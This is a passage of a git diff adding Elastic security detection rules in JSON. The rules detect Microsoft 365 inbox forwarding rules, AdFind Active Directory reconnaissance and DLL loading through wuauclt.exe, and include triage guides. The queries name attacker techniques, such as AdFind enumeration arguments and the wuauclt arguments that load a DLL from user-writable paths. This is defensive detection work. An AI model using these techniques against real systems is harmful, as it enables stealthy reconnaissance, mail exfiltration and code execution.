+ {
+ "id": "T1036",
+ "name": "Masquerading",
+ "reference": "https://attack.mitre.org/techniques/T1036/",
+ "subtechnique": [
+ {
+ "id": "T1036.005",
+ "name": "Match 
Legitimate Name or Location",
+ "reference": "https://attack.mitre.org/techniques/T1036/005/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 110
+ },
+ "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_110",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json
new file mode 100644
index 00000000000..36a8192039c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103.json
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json new file mode 100644 index 00000000000..ef3d1aef62f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json new file mode 100644 index 00000000000..c49ebb3e604 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206.json 
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Inbox Forwarding Rule Created", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and\nevent.category:web and event.action:(\"New-InboxRule\" or \"Set-InboxRule\") and\n (\n o365.audit.Parameters.ForwardTo:* or\n o365.audit.Parameters.ForwardAsAttachmentTo:* or\n o365.audit.Parameters.RedirectTo:*\n )\n and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Collection" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json new file mode 100644 index 00000000000..f1a9d9176cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_110.json 
@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdFind Command Activity", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"AdFind.exe\" or ?process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "references": [ + "http://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "eda499b8-a073-4e35-9733-22ec71f57f3a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json new file mode 100644 index 00000000000..5ebd333808a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json 
@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdFind Command Activity", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"AdFind.exe\" or ?process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "references": [ + "http://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "eda499b8-a073-4e35-9733-22ec71f57f3a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json new file mode 100644 index 00000000000..34154c3c24e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, 